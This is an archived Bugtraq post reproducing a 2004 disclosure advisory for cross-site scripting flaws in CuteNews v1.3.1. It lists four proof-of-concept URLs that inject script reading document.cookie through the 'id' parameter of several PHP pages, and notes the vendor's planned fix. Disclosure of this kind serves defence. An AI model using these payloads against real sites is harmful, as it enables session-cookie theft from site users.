Cross-Site Scripting CuteNews

• Previous message: Gregory Duchemin: "ISC DHCP overflows"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: bugtraq@securityfocus.com
Date: Sun, 27 Jun 2004 17:37:12 -0700

http://www.swp-zone.org/archivos/advisory-06.txt

-------------------------------------------------------------------------------------------------

                            :.: Cross-Site Scripting CuteNews :.:

  PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.1
  BUG: Cross-Site Scripting
  DATE: 23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@peru.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    CuteNews is a popular News Publishing, written in php by
    CutePHP.

2.- Vulnerabilities:
    ---------------

    A. Cross-Site Scripting aka XSS:

    :.: In Id :
 http://attacker/show_archives.php?subaction=showcomments&id=>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&

http://attacker/show_news.php?subaction=showcomments&id=>alert(document.cookie);</script>&archive=&start_from=&ucat=&

http://attacker/example1.php?subaction=showfull&id=>alert(document.cookie);</script>

http://attacker/example2.php?subaction=showfull&id=>alert(document.cookie);</script>

    
   
3.- SOLUTION:
     จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho@peru.com

-------------------------------------------------------------------------------------------------
                                ___________ ____________
                               / _____/ \ / \______ \
                               \_____ \\ \/\/ /| ___/
                              / \\ / | |
                             /_______ / \__/\ / |____|
                             \/ \/
                       
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF
]----------------------------------------------
 
  
  
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

• Previous message: Gregory Duchemin: "ISC DHCP overflows"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]